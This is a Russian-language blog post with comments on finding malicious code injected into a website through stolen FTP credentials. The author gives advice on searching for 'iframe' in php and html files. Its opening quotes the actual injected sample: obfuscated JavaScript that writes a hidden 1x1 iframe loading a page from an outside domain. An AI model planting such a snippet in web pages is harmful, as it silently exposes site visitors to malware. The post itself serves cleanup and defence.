Как найти вирус на сайте
Вирусный код с сайта:
<script language=JavaScript>
jhtm='%3Ciframe%20src%3D%22http%3A//inanalitics.in/inc/top/iframe.php%22
%20width%3D1%20height%3D1%20style%3D%22visibility%3A%20hidden%22%3E%3C
/iframe%3E';crypo=unescape(jhtm);document.write(crypo);
</script>
Не так давно меня попросили разобраться с одним сайтом. Яндекс пометил его как распростаняющий вирусы, о чем выдавал информацию сразу после ссылки на сайт, да и антивирусы, способные фильтровать интернет-трафик, также ругаются на такие сайты.
Действительно, вирусы, написанные для сайтов, набирают популярность. Но надо понимать, что большинстве случаев, сам вирус находится на компьютере, имеющем ftp доступ к сайту. Принцип действия примерно следующий - вирус незаметно для пользователя крадёт пароли от ftp, подключается и вставляет в скрипты сайта паразитный код.
Для начала необходимо вылечить заражённый компьютер. Только после этого можно подключаться к удаленному серверу по FTP или SSH и начинать поиски файлов, заражённых вирусом. Для небольших проектов можно скачать весь сайт на локальный компьютер и осуществить поиск получится быстрее. Хотя это далеко не лучший вариант (особенно повезет владельцам сайтов на битриксе, в виду ОГРОМНОГО количества файлов этой кривой системы).
Что искать? Где искать? Это наверное два главных вопроса.
На первый вопрос отвечаю, что искать следует подозрительные строки в тексте, где встречается слово iframe, причем поиск начинать прежде всего с файлов index.html, index.php. Далее по всем .php и .html файлам.
Ну а найденное мной конкретно в описанном случае, вы увидели в самом начале этой статьи. Данный код находился в самом начале файла index.php в корневой директории сайта.
Комментариев: 5
Первый отрицательный отзыв про битрикс нашел! Где то в тексте. Неужели с ним всё так плохо?
Мне хватило разработки одного шаблона для битрикса, для понимания того, что из недр 1С ничего путного ещё не выходило. Ну и переезд на другой хостинг с этой системой тоже очень порадовал.
Наверное, я сам попробую, посмотрю что за цмс. Был интерес, но всё как то руки не доходят....
Я нашел спсоб, как найти вирус на сайте. Достаточно иметь при себе тотал коммандер и чуточку терпения:)
Мою статью «Как найти и удалить вирус с сайта wordpress. Антивирус wordpress» можно прочесть здесь:http://blogalt.ru/wordpress/antiviruswordpress.html
Попробуйте поискать онлайн сканерами уязвимости чтобы найти вирусы. Например это acunetix.com или metascan.ru, отличные утилиты